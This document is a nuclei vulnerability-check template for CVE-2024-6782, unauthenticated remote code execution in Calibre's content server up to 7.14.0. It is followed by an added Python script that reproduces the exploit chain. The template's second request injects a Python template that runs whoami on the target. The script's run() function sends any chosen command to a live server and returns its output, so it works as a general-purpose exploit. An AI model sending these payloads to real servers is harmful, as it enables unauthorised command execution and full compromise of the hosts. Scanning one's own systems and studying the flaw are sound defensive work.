id: CVE-2024-6782

info:
  name: Calibre <= 7.14.0 - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    Unauthenticated remote code execution via Calibre's content server in Calibre <= 7.14.0.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise.
  remediation: |
    Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  classification:
    cve-id: CVE-2024-6782
    cwe-id: CWE-863
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    epss-score: 0.83206
    epss-percentile: 0.99638
    cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: calibre-ebook
    product: calibre
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-request: 2
  tags: cve,cve2024,calibre,rce,vuln,vkev

http:
  # Request 1: pull a book id from the library listing; the second request
  # is only sent when this extractor succeeds (an empty library yields no id).
  - raw:
      - |
        GET /interface-data/books-init HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    extractors:
      - type: json
        name: book_ids
        internal: true
        json:
          - '.search_result.book_ids[0]'

  # Request 2: a "python:" template passed to the cdb list command is compiled
  # and executed server-side. The payload runs whoami (cmd.exe first, sh as the
  # fallback), so this check executes a command on the target.
  - raw:
      - |
        POST /cdb/cmd/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [
          ["template"],
          "",
          "",
          "",
          {{book_ids}},
          "python:def evaluate(a, b):\n    import subprocess\n    try:\n        return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n    except Exception:\n        return subprocess.check_output(['sh', '-c', 'whoami'])\n"
        ]

    matchers-condition: and
    matchers:
      # check_output returns bytes; the server renders their repr, b'...'
      - type: regex
        part: body
        regex:
          - "b'([^']+)"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c478e6631df8093642a219e0510cc69613d3cc598dcfbcb39691f742386d21df02200ef1775b4d68cf5b4655d09c1f28e0b4786998919ad19b016c6811abff074908:922c64590222798bb761d5b6d8e72950
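The two-request chain above, reproduced in plain Python as an added example (it is not part of the nuclei template or of the Calibre project) so that the extractor, the payload construction and the three matchers can be inspected and unit-tested offline. The sample responses are constructed and trimmed to the fields the template reads; the use of `urllib`, the timeout value and the helper names are this example's own choices. A local `compile()` of the generated template body is included because a flattened payload (the whitespace-collapsed form this template is often copied in) is rejected by the server and the check then misses silently.

```python
import json
import re
import urllib.request

# Constructed sample responses (trimmed to the fields the template uses), not
# captured from a real server. books-init returns far more than this.
SAMPLE_BOOKS_INIT = json.dumps({"search_result": {"book_ids": [7, 3], "total_num": 2}})
# The template field holds the repr of the bytes check_output returned, b'...'.
SAMPLE_LIST_RESPONSE = json.dumps({"book_ids": [7], "data": {"7": {"template": "b'root\\n'"}}})

# Same expression as the template's first matcher.
OUTPUT_RE = re.compile(r"b'([^']+)")


def template_source(command):
    """Python body the server is asked to compile and run. Mirrors the
    template's payload: try cmd.exe first, fall back to sh on non-Windows."""
    return (
        "def evaluate(a, b):\n"
        "    import subprocess\n"
        "    try:\n"
        f"        return subprocess.check_output(['cmd.exe', '/c', {command!r}])\n"
        "    except Exception:\n"
        f"        return subprocess.check_output(['sh', '-c', {command!r}])\n"
    )


def payload_is_valid_python(command):
    """Compile the generated body locally before sending it; a mis-indented
    payload never executes on the server and the check produces no match."""
    try:
        compile(template_source(command), "<calibre-template>", "exec")
        return True
    except SyntaxError:
        return False


def extract_book_id(books_init_body):
    """Template extractor '.search_result.book_ids[0]'. Raises IndexError on an
    empty library, the case in which the nuclei template never sends request 2."""
    return json.loads(books_init_body)["search_result"]["book_ids"][0]


def build_list_command(book_id, command):
    """JSON array for POST /cdb/cmd/list, positional arguments copied from the
    template's request body; the book id is inserted as a bare integer."""
    return json.dumps([["template"], "", "", "", book_id, "python:" + template_source(command)])


def matches(body, content_type, status):
    """The template's three matchers combined with matchers-condition: and."""
    return (OUTPUT_RE.search(body) is not None
            and "application/json" in content_type
            and status == 200)


def parse_output(body):
    """Captured group of the regex matcher: the command output as it appears
    inside the JSON-escaped bytes repr (escape sequences are left as-is)."""
    m = OUTPUT_RE.search(body)
    return m.group(1) if m else None


def run(base_url, command="whoami", timeout=10):
    """Send the same two requests as the template to a live content server.
    This executes `command` on the target; urlopen raises on non-200 replies."""
    req = urllib.request.Request(base_url + "/interface-data/books-init",
                                 headers={"Referer": base_url})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        book_id = extract_book_id(resp.read().decode("utf-8", "replace"))
    req = urllib.request.Request(base_url + "/cdb/cmd/list",
                                 data=build_list_command(book_id, command).encode(),
                                 headers={"Content-Type": "application/json"},
                                 method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
        if matches(body, resp.headers.get("Content-Type", ""), resp.status):
            return parse_output(body)
    return None


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print(run(sys.argv[1].rstrip("/")))
    else:
        # Offline walk-through on the constructed samples.
        print(extract_book_id(SAMPLE_BOOKS_INIT), parse_output(SAMPLE_LIST_RESPONSE))
```

Usage: `python3 check.py http://host:8080` sends both requests and prints the captured output, while running it with no argument exercises only the constructed samples. Note that the regex matcher keys on the `b'` prefix of a bytes repr, so any JSON body that happens to contain that substring would also satisfy it; the content-type and status matchers narrow this but do not eliminate it.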